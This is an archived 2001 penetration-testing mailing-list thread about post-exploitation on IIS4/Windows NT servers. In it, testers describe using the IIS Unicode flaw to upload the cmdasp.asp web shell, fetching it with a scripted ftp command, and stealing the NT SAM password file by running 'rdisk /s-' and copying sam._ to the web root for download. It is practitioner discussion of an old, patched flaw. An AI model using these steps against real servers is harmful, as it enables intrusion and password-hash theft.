Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Penetration Testing: Re: Pwdump2 with UNICODE?

Re: Pwdump2 with UNICODE?

From: Tony Lambiris <methodic_at_libpcap.net>
Date: Thu, 9 Aug 2001 13:35:27 -0400

Ahh.. so you can basically echo a bunch of ftp commands to a file, run
the ftp client -s:filename.txt to have the box download cmdasp.asp, and
then you can just have that page execute commands?

Nice.

On 08.09.01, "Sapiro, Benjamin R" <bsapiro_at_kpmg.ca> wrote:
> Tony
>
> Under IIS4, CMDASP.asp executes in system level context so you are able to
> do that (CMDASP.asp has nothing to do with the unicode vuln. itself, we just
> use unicode attacks to get script up onto the box). You are right though, a
> unicode executed command by itself runs under IUSR context
>
> Ben Sapiro
> Information Risk Management
> (416) 777-8025
> www.kpmg.ca/irm
>
>
> -----Original Message-----
> From: Tony Lambiris [mailto:methodic_at_libpcap.net]
> Sent: Wednesday, August 08, 2001 1:46 PM
> To: Penetration Testers
> Subject: Re: Pwdump2 with UNICODE?
>
>
> I thought under UNICODE, you arent able to run such commands as rdisk
> and pwdump, because IIS runs as IUSR?
>
> On 08.07.01, Kevin Lam <kevinlam_at_packet-works.com> wrote:
> > Hi Allen,
> >
> > If you have UNICODE working, you could upload cmdasp.asp which will let
> > you execute commands on that server.
> >
> > If this is NT then what you can do is run "rdisk /s-" to silently update
> > the repair sam._ file (this is a little trick that I used to use when I
> > did pen-testing for Deloitte). Then go to c:\winnt\repair and copy
> > sam._ to say a public internet folder like c:\inetpub\wwwroot and then
> > go to your browser and just download the file.
>
>
> ******************************************************************************
> The information in this email is confidential and may be legally privileged.
> It is intended solely for the addressee. Access to this email by anyone else
> is unauthorized.
>
> If you are not the intended recipient, any disclosure, copying, distribution
> or any action taken or omitted to be taken in reliance on it, is prohibited
> and may be unlawful. When addressed to our clients any opinions or advice
> contained in this email are subject to the terms and conditions expressed in
> the governing KPMG client engagement contract.
> ******************************************************************************

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
Received on Aug 09 2001

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos